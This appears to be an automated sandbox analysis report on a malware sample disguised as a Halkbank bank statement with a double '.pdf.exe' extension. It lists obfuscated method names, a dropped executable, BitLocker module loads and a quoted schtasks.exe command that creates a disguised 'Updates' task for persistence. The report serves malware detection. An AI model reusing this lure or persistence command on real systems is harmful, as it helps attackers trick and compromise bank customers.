Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, A5UsvpMpEHJkn9qDU9W.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UuZxHXtbMR', 'ASyxmJdmUl', 'MFVxP39OTf', 'lUIxxNaV2b', 'VAyxedmJUr', 'rPnxiOAH4g', 'f1qxjhlqyq'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, jP1unyN2oGvDwh64gi.cs	High entropy of concatenated method names: 'Dispose', 'IfdMtK9nLs', 'zlq4db25qe', 'Yrr8IZEvkW', 'MIjMAU77O4', 'i8JMzFyXh0', 'ProcessDialogKey', 'n9V4LYu4xH', 'nfE4MfRW8j', 'LOZ44Siuqf'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, GTur6B8yg2fdK9nLsV.cs	High entropy of concatenated method names: 'OfOHvSqCyE', 'LECHKx3rVf', 'h5lHHHs1PA', 'd9rHP4Qsoo', 'WovHe7EDGx', 'LsiHj5y3LA', 'Dispose', 'lH23Uq4P2X', 'JiU3N5HD1H', 're83sLAyuc'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, wyeF51BIwr0mXe5ELg.cs	High entropy of concatenated method names: 'XIKsSweCfZ', 'yA9sCRFmuo', 'z49sQ3jam8', 'upisBhOxGJ', 'ISXsvH0717', 'sJms6V30fP', 'MEbsKpaaWX', 'qlFs30palP', 'D88sHbgkTk', 'F8LsmRqekg'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, eHeeXe43slst5aE0UG.cs	High entropy of concatenated method names: 'PuZo2oYSh', 'yInScGcCi', 'oMTCBfnlw', 'lQFbLUncs', 'X3eBACXmw', 'vA1crES6c', 'VQvQ2PTTVGGcSA8Ifm', 'vHCWNKtlvFrWwsy1DK', 'Qcu3tK5w1', 'GMTmiEV5K'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, HWm1sQEuyj2n7x1BDG.cs	High entropy of concatenated method names: 'FiTDQQw5dh', 'rF7DB8dtdA', 'ONGDftOEgY', 'afrDdKJMxl', 'yJcD0BFToR', 'lr8DhQJcc9', 'AJlDrIkWgJ', 'syqDYrVcr7', 'GQJDTm09pV', 'o0vDgm48Py'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, PVvodQz53Vi2yTjvSW.cs	High entropy of concatenated method names: 'zOWmCErDcx', 'X9PmQo6jMs', 'rPUmBS8F1u', 'Us7mfq1hSr', 'VsBmdyZWnh', 'ryUm0FEXVr', 'jUdmhQmOP1', 'TadmjXkG2T', 'ej1mW3xyVH', 'Bw1mI0wmsA'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, ceKrCKM4dLdlJ2Gs3fI.cs	High entropy of concatenated method names: 'ToString', 'm2APQcxT9E', 'GyaPBQ3hyV', 'Tq0PcLmjMv', 'XxlPfa0WZP', 'r3DPdNddHj', 'dqvP2s964V', 'gjwP0fB0Zb', 'nHPa2h1NZjodDNgiQHL', 'I5Ue6k1OqXyvPk49mmv'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, QimdgFfnGpuGaih5x5.cs	High entropy of concatenated method names: 'vlDR9E60of', 'mi9RNI5eKS', 'fBYRJpTe2A', 'sibRlCrWkd', 'lwkRZdP7JC', 'H3CJkILYVB', 'YMOJn8EEgK', 'n18J8MqwkJ', 'jpZJ5wgdZ8', 'vPnJtQbWOs'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, wvGf3HMMix1iG68Ks1m.cs	High entropy of concatenated method names: 'i9mmAokSbD', 'zmxmzWkV03', 'hvLPL2X4hs', 'wn0PMDUiEb', 'pvWP4JqsND', 'XPUPw9fdfE', 'NE1PpdQikZ', 'CnFP9WOAb7', 'KufPUqfSQ0', 'zr3PNHLJx0'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, pLBtrKsqsc2mU2nMSg.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'eD64tw6Dqh', 'vFf4AnF7VA', 'HBh4zZbUn9', 'huuwLq4DNK', 'cbDwMSmaSB', 'w06w4siPHJ', 'm0RwwCJLon', 'ylgdnwyIsYdbCtvl0lx'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, fskFMTQvUvBKdNLjaa.cs	High entropy of concatenated method names: 'bXANO8jJwS', 'vtuNypLtY5', 'gMXNa35g3U', 'xJINub13wV', 'GPeNkcgc3B', 'mWINnby8S0', 'Qx4N83X2fT', 'Dd9N5h3Ku0', 'AQZNt1gcoy', 'jYTNA2AUYj'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, HbgmRAcbd9UriixnOC.cs	High entropy of concatenated method names: 'keAJGTFcaH', 'GRSJb4UL5l', 'GjEs22gWi8', 'aeMs0jPLvI', 'HHfshuvP2y', 'J6Ys1jsQ4v', 'UJ0srP0NTL', 'EvHsY7Ye3I', 'qpJsVHU36m', 'tEdsTuFVrL'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, AiuqfvA7tCsZt0nIOj.cs	High entropy of concatenated method names: 'L4NmslLO6O', 'VELmJQnByG', 'VoNmRSDKoM', 'wWNmliiYMG', 'gB7mH4Zg1q', 'lx0mZRorNV', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, s7Ir7irVkHNL8Hrwru.cs	High entropy of concatenated method names: 'ITYlUbX8ic', 'G1Mls5odT0', 'hHflRQMKgv', 'V7JRA4u0Fy', 'iv6RzRxwMq', 'xf4lLnsZAT', 'dwplMZiHON', 'nuKl44678N', 'Q8ilw1QsPJ', 'TfAlp7MMLc'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, XkGl3dOC5iY8CCvPpO.cs	High entropy of concatenated method names: 'WbfvTBjRf6', 'x0JvqNKB6o', 'X29vOm89YW', 'vwJvykUt1T', 'EO3vdKTZoC', 'aynv2sZNmi', 'F0Hv0VtCY6', 'YWtvhmUeXI', 'JTCv11CdD9', 'KN4vr5beOX'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, WkKyK7nbTK5CdCEUPp.cs	High entropy of concatenated method names: 'eWmK5kENPm', 'CofKAXJU6Y', 'yLU3LiLVaD', 'ueT3Mk8EKB', 'uLeKgqd8OL', 'wsxKqT5DPd', 'vwZKEgjNPI', 'sFwKO4pnse', 'CePKywaSex', 'o6IKaypFec'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, MYu4xHtDfEfRW8jrOZ.cs	High entropy of concatenated method names: 'lQYHfOqfLN', 'VQsHdS2EUZ', 'mfrH2GGiKb', 'VgqH0gUkOs', 'mneHhi7fym', 'kPGH104ORT', 'KgCHrRsN0U', 'OAEHYIobCv', 'fP6HVNtOXc', 'Py7HTESqqG'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, DZPgcIVA8ODdlPkZxD.cs	High entropy of concatenated method names: 'AbilWOOxhg', 'umilIoe9Ok', 'WAelo4F7bB', 'aC0lSRlOj8', 'XBclGbBt9w', 'ceVlChU8qm', 'fUnlbBnCTi', 'd1jlQHJ8Kp', 'WwjlBPb25S', 'D0klcTxxTk'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, MssHojpeKv8VN6JGBo.cs	High entropy of concatenated method names: 'LBUMlskFMT', 'oUvMZBKdNL', 'KIwM7r0mXe', 'XELMFg2bgm', 'wxnMvOCEim', 'GgFM6nGpuG', 'ek1ymOOXNo7Sk1YnJ8', 'VRBouH2RZ9hdD54oPk', 'e1IMMAIEll', 'W2SMwp9jup'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, VyF3LrZTnRfCPUYiQo.cs	High entropy of concatenated method names: 'SfLw9SatMy', 'JTTwUASRFG', 'xIjwNWcFms', 'JPAwsnG8dk', 'ENqwJXEZFP', 'KDTwRHFFOu', 'SPuwl1fasL', 'So8wZTPvrk', 'lj7wXc8Nnk', 'TY5w7c4dkZ'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, A5UsvpMpEHJkn9qDU9W.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UuZxHXtbMR', 'ASyxmJdmUl', 'MFVxP39OTf', 'lUIxxNaV2b', 'VAyxedmJUr', 'rPnxiOAH4g', 'f1qxjhlqyq'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, jP1unyN2oGvDwh64gi.cs	High entropy of concatenated method names: 'Dispose', 'IfdMtK9nLs', 'zlq4db25qe', 'Yrr8IZEvkW', 'MIjMAU77O4', 'i8JMzFyXh0', 'ProcessDialogKey', 'n9V4LYu4xH', 'nfE4MfRW8j', 'LOZ44Siuqf'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, GTur6B8yg2fdK9nLsV.cs	High entropy of concatenated method names: 'OfOHvSqCyE', 'LECHKx3rVf', 'h5lHHHs1PA', 'd9rHP4Qsoo', 'WovHe7EDGx', 'LsiHj5y3LA', 'Dispose', 'lH23Uq4P2X', 'JiU3N5HD1H', 're83sLAyuc'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, wyeF51BIwr0mXe5ELg.cs	High entropy of concatenated method names: 'XIKsSweCfZ', 'yA9sCRFmuo', 'z49sQ3jam8', 'upisBhOxGJ', 'ISXsvH0717', 'sJms6V30fP', 'MEbsKpaaWX', 'qlFs30palP', 'D88sHbgkTk', 'F8LsmRqekg'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, eHeeXe43slst5aE0UG.cs	High entropy of concatenated method names: 'PuZo2oYSh', 'yInScGcCi', 'oMTCBfnlw', 'lQFbLUncs', 'X3eBACXmw', 'vA1crES6c', 'VQvQ2PTTVGGcSA8Ifm', 'vHCWNKtlvFrWwsy1DK', 'Qcu3tK5w1', 'GMTmiEV5K'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, HWm1sQEuyj2n7x1BDG.cs	High entropy of concatenated method names: 'FiTDQQw5dh', 'rF7DB8dtdA', 'ONGDftOEgY', 'afrDdKJMxl', 'yJcD0BFToR', 'lr8DhQJcc9', 'AJlDrIkWgJ', 'syqDYrVcr7', 'GQJDTm09pV', 'o0vDgm48Py'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, PVvodQz53Vi2yTjvSW.cs	High entropy of concatenated method names: 'zOWmCErDcx', 'X9PmQo6jMs', 'rPUmBS8F1u', 'Us7mfq1hSr', 'VsBmdyZWnh', 'ryUm0FEXVr', 'jUdmhQmOP1', 'TadmjXkG2T', 'ej1mW3xyVH', 'Bw1mI0wmsA'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, ceKrCKM4dLdlJ2Gs3fI.cs	High entropy of concatenated method names: 'ToString', 'm2APQcxT9E', 'GyaPBQ3hyV', 'Tq0PcLmjMv', 'XxlPfa0WZP', 'r3DPdNddHj', 'dqvP2s964V', 'gjwP0fB0Zb', 'nHPa2h1NZjodDNgiQHL', 'I5Ue6k1OqXyvPk49mmv'
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, QimdgFfnGpuGaih5x5.cs	High entropy of concatenated method names: 'vlDR9E60of', 'mi9RNI5eKS', 'fBYRJpTe2A', 'sibRlCrWkd', 'lwkRZdP7JC', 'H3CJkILYVB', 'YMOJn8EEgK', 'n18J8MqwkJ', 'jpZJ5wgdZ8', 'vPnJtQbWOs'

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe

File created: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: Halkbank Ekstre.pdf.exe

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
